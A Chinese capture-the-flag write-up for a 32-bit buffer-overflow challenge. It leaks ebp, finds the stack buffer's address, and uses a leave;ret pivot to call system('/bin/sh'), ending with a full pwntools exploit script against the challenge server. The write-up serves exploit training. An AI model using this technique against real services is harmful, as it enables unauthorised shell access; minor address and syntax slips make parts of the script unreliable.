步骤:
例行检查,32位程序,开启了nx保护
32位ida载入,shif+f12查看程序里的字符串,这边的“echo flag” 是个迷惑性的字符串,它只是输出了flag这4个字符,但是程序里有system函数,到时候这个函数可以直接拿来使用
system_addr=0x80048400
main函数
程序主体在vul函数里
读入0x30字节数据给s,s大小是0x28,只能溢出0x8字节,覆盖到ret,没法构造太长的rop,但是这边可以给s写入2次数据,我们可以通过第一次输入来泄露程序里的ebp地址,知道了ebp的地址就能够推算出参数s在栈上的地址,第二次直接往栈上写入system(‘/bin/sh’),之后利用leave;ret的栈劫持去到参数s的栈,让它去执行我们布置在栈上的system(‘/bin/sh’)来获取shell
利用过程:
一、泄露ebp
printf函数在输出的时候遇到’\0‘会停止,如果我们将参数s全部填满,这样就没法在末尾补上’\0‘,那样就会将ebp连带着输出
payload='a'*0x27+'b'
r.sendline(payload)
r.recvuntil('b')
ebp=u32(r.recv(4))
二、找到参数s在栈上的位置
首先下个断点,来调试一下我们的ebp距离参数s的位置,在main函数的nop处下断点
’bbbb‘ 是我输入的参数,可以看到ebp距离我们输入的参数的距离是0x38
ebp-0x38就拿到了我们参数s在栈上的位置
三、布置s栈上的值
由于我们要用到leave;ret来劫持栈,所以先找一下leva;ret的位置
构造
payload='aaaa'+p32(sys)+p32(main)+p32(s+0x10)+"/bin/sh"
第一个’aaaa‘随便输入,如果一开始将system函数写第一个,那么我们在用leave;ret劫持栈的时候要抬高4字节
接着跟上system函数的地址
后面是执行完system函数后的返回地址,这边也可以随便写
之后是一个地址,这个地址指向的是我们写在栈上的’/bin/sh‘字符串
将参数0x28长的s补齐
payload2=payload2.ljust(0x28,'\x00'
四、栈劫持,获取shell
payload2+=p32(s)+p32(leave_ret)
完整exp
from pwn import *
r=remote('node3.buuoj.cn',28967)
sys=0x8048400
leave_ret=0x08048562
main=0xdeadbeef
payload='a'*0x27+'b'
r.send(payload)
r.recvuntil("b")
s=ebp=u32(r.recv(4))-0x38
payload2='aaaa'+p32(sys)+p32(main)+p32(s+0x10)+"/bin/sh"
payload2=payload2.ljust(0x28,'\x00')
payload2+=p32(s)+p32(leave_ret)
r.send(payload2)
r.interactive()
手机扫一扫
移动阅读更方便
你可能感兴趣的文章